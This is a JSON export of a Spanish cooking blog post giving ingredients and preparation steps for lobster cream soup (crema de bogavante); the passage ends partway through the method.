{"id":3840,"date":"2017-01-31T09:02:02","date_gmt":"2017-01-31T07:02:02","guid":{"rendered":"http:\/\/www.bcnkitchen.com\/blog\/?p=3840"},"modified":"2018-07-12T04:23:24","modified_gmt":"2018-07-12T02:23:24","slug":"crema-de-bogavante","status":"publish","type":"post","link":"https:\/\/www.bcnkitchen.com\/blog\/crema-de-bogavante\/","title":{"rendered":"Crema de bogavante"},"content":{"rendered":"<p style=\"text-align: justify;\">[one_third]<strong>Ingredientes<\/strong>\u00c2\u00a0(para 4 personas):<\/p>\n<ul style=\"text-align: justify;\">\n<li>2 bogavantes<\/li>\n<li>4 rebanadas de pan<\/li>\n<li>1 cebolleta<\/li>\n<li>1 puerro<\/li>\n<li>2 zanahorias<\/li>\n<li>1 L de fumet de pescado<\/li>\n<li>50 ml de brandy<\/li>\n<li>50 ml de nata l\u00edquida<\/li>\n<li>1 cucharadita de piment\u00f3n dulce<\/li>\n<li>1 diente de ajo<\/li>\n<li>1 guindilla cayena<\/li>\n<li>Aceite de oliva[\/one_third][two_third_last]<strong>Elaboraci\u00f3n:<\/strong><\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Cortamos\u00c2\u00a0los bogavante en dos a lo largo, reservando la cola y las pinzas peladas para el final de la receta.\u00c2\u00a0Pochamos\u00c2\u00a0en una olla con aceite de oliva durante 10 minutos, la cebollita cortada en juliana, el puerro y la zanahoria pelada en trozos peque\u00f1os. Cocinamos sin que tomen color y le a\u00f1adimos el diente de ajo entero y pelado.<\/p>\n<p style=\"text-align: justify;\">A\u00f1adimos\u00c2\u00a0los trozos de pan a la olla para que fr\u00edan un poco, y cocinamos el conjunto durante 20 minutos, removiendo de vez en cuando para que no se nos pegue.\u00c2\u00a0Agregamos\u00c2\u00a0el piment\u00f3n y r\u00e1pidamente cortamos la cocci\u00f3n con el brandy. Cuando se pierda el alcohol vertemos el fumet de pescado y cocinamos durante 20 minutos.<\/p>\n<p style=\"text-align: justify;\">Trituramos\u00c2\u00a0el conjunto, rectificando de sal y colamos fino, para evitar que pase ninguna cascara.
